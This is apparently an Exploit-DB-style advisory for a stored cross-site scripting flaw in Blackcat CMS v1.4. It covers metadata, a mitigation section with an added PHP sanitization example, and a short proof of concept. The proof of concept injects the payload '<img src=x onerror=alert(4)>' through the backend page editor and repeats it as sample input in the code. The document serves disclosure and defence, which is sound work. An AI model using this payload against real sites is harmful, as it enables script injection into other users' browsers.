Vendor: Blackcat CMS
By: Mirabbas Agalarov
CVSS: 5 (MEDIUM)
Stored XSS
CWE: 79
Product Name: Blackcat CMS
Affected Version From: v1.4
Affected Version To: v1.4
Patch Exists: NO
Related CWE:
CPE: a:blackcatdevelopment:blackcat_cms:1.4
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

Blackcat Cms v1.4 – Stored XSS

Blackcat CMS version 1.4 is vulnerable to stored cross-site scripting (XSS). A logged-in user can save HTML containing script into page content through the backend page editor, and the browser executes it when the targeted user views the affected page.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper output encoding.
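
One way to apply this mitigation in PHP, as an added example that is not Blackcat CMS code and not part of the original advisory. The function names and the tag allowlist are hypothetical and stand for an assumed content policy: plain-text fields are encoded on output, and fields that must keep HTML pass through an allowlist filter.

```php
<?php
// Added example: hypothetical helpers, not Blackcat CMS code.
// Assumed policy: tags and attributes permitted in stored page content.
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'strong' => [], 'em' => [], 'ul' => [], 'ol' => [],
    'li' => [], 'a' => ['href', 'title'], 'img' => ['src', 'alt'],
];

// Plain-text fields (titles, descriptions): encode at output time.
function encode_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True for http(s) and relative URLs; false for javascript:, data: and other schemes.
function is_safe_url(string $url): bool
{
    $url = preg_replace('/[\x00-\x20]+/', '', $url); // browsers ignore these characters
    return preg_match('~^https?://~i', $url) === 1
        || preg_match('~^[^/?#]*:~', $url) === 0;
}

// Rich-text fields: drop every tag and attribute that is not allowlisted.
function sanitize_html(string $html): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate malformed markup
    $meta = '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">';
    $doc->loadHTML("<html><head>$meta</head><body>" . $html . '</body></html>');
    libxml_clear_errors();
    $body = $doc->getElementsByTagName('body')->item(0);
    foreach (iterator_to_array((new DOMXPath($doc))->query('.//*', $body), false) as $node) {
        $tag = strtolower($node->nodeName);
        if (!array_key_exists($tag, ALLOWED_TAGS)) {
            $node->parentNode->removeChild($node); // script, iframe, svg, ...
            continue;
        }
        foreach (iterator_to_array($node->attributes, false) as $attr) {
            $ok = in_array($attr->name, ALLOWED_TAGS[$tag], true)
                && (!in_array($attr->name, ['href', 'src'], true) || is_safe_url($attr->value));
            if (!$ok) { $node->removeAttribute($attr->name); } // onerror, onload, style, ...
        }
    }
    // Serialize only what is left inside <body>.
    return implode('', array_map([$doc, 'saveHTML'], iterator_to_array($body->childNodes, false)));
}

// Run both paths on the payload from the steps on this page (sample input).
echo sanitize_html('<p>Welcome</p><img src=x onerror=alert(4)>'), "\n";
echo encode_text('<img src=x onerror=alert(4)>'), "\n";
```

Filtering when the page is saved keeps the stored copy clean, and filtering again when it is rendered covers content that was stored before the filter existed.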

Exploit-DB raw data:

Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1